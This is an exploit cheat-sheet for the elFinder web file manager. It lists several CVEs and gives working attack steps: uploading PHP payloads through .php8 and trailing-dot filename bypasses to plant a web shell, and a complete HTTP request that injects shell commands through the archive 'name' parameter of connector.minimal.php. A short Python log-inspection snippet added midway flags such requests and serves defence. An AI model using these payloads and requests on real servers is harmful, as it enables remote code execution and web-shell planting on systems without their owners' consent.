ElFinder
ElFinder Exploits
elFinder is an open-source file manager for web, written in JavaScript using jQuery UI - Ref: https://github.com/Studio-42/elFinder
CVE-2023-52044 - ElFinder 2.1.62 - RCE
Studio-42 elFinder 2.1.62 is vulnerable to Remote Code Execution (RCE) as there is no restriction for uploading files with the .php8 extension.
Select arbitrary png file to upload
Capture request with Burp and set content as
test<?php phpinfo();?>
Set filename like
test.php8
After forwarding the request, the file is successfully uploaded under the files directory
CVE-2023-35840 - elFinder < 2.1.62 - Path Traversal
elFinder < 2.6.61 - RCE
Upload a PHP file that contains a payload with a preceding a, i.e. a<?php <payload>?>.
Add two dots after the file name: shell.php...
The shell file is successfully uploaded by bypassing detection and can be accessed via files/shell.php.
CVE-2022-26960 - LFI
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php.

CVE-2021-32682 - RCE
Create a plain text file named 1.txt

Archive this file in the right-click menu to ZIP format, and modify this archived file name to 2.zip

1.txt and 2.zip are ready here

Then, send the following request to execute arbitrary commands:
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
In this request, you can see 3 important parameters:
name, its value is equal to -TvTT=id>shell.php # a.zip, you can modify the id>shell.php to arbitrary commands
targets[0], its value is equal to l1_MS50eHQ. l1 means the first storage volume, MS50eHQ is the base64 encoded string of 1.txt
targets[1], its value is equal to l1_Mi56aXA. l1 means the first storage volume, Mi56aXA is the base64 encoded string of 2.zip
Although this request responds with an error message, our command has been executed and shell.php has been written to http://your-ip:8080/files/shell.php
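
For log review, the parameter layout described above can be turned into a check. This is an added example, not code from the original page or from elFinder: it decodes the targets hashes and flags cmd=archive requests whose name looks like a command-line option or carries shell metacharacters. The function names, the metacharacter set, the benign sample line and the URL-safe base64 handling are assumptions.

```python
import base64
import binascii
from urllib.parse import urlsplit, parse_qs

SHELL_META = set(">|;&`$#<")  # assumed set of characters worth flagging in an archive name

def decode_target(target_hash):
    """Split a hash such as l1_MS50eHQ into (volume, path); padding is re-added before decoding."""
    volume, _, enc = target_hash.partition("_")
    enc += "=" * (-len(enc) % 4)
    try:
        # URL-safe alphabet is an assumption; the page only says "base64".
        return volume, base64.urlsafe_b64decode(enc).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return volume, None  # not decodable, keep the volume for triage

def inspect_request(request_line):
    """Return a finding for a suspicious archive request line, or None if it looks normal."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = parse_qs(urlsplit(parts[1]).query)
    if query.get("cmd", [""])[0] != "archive":
        return None
    name = query.get("name", [""])[0]
    reasons = []
    if name.startswith("-"):
        reasons.append("name starts with '-' and reads as an option")
    if SHELL_META & set(name):
        reasons.append("shell metacharacter in name")
    if not reasons:
        return None
    targets = [decode_target(v[0]) for k, v in sorted(query.items())
               if k.startswith("targets[")]
    return {"name": name, "reasons": reasons, "targets": targets}

# Request line taken from the page.
PAGE_REQUEST = ("GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php"
                "%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA"
                "&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1")
# Constructed sample of an ordinary archive request.
BENIGN_REQUEST = ("GET /php/connector.minimal.php?cmd=archive&name=backup.zip"
                  "&target=l1_Lw&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1")

if __name__ == "__main__":
    for line in (PAGE_REQUEST, BENIGN_REQUEST):
        print(inspect_request(line))
```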

CVE-2021-43421 RCE in elFinder <2.1.60
elFinder 2.1.57 RCE
elFinder Web file manager Version: 2.1.53 Remote Command Execution
CVE-2019-9194 - elFinder <= 2.1.47 - Command Injection
Vulnerability in the PHP connector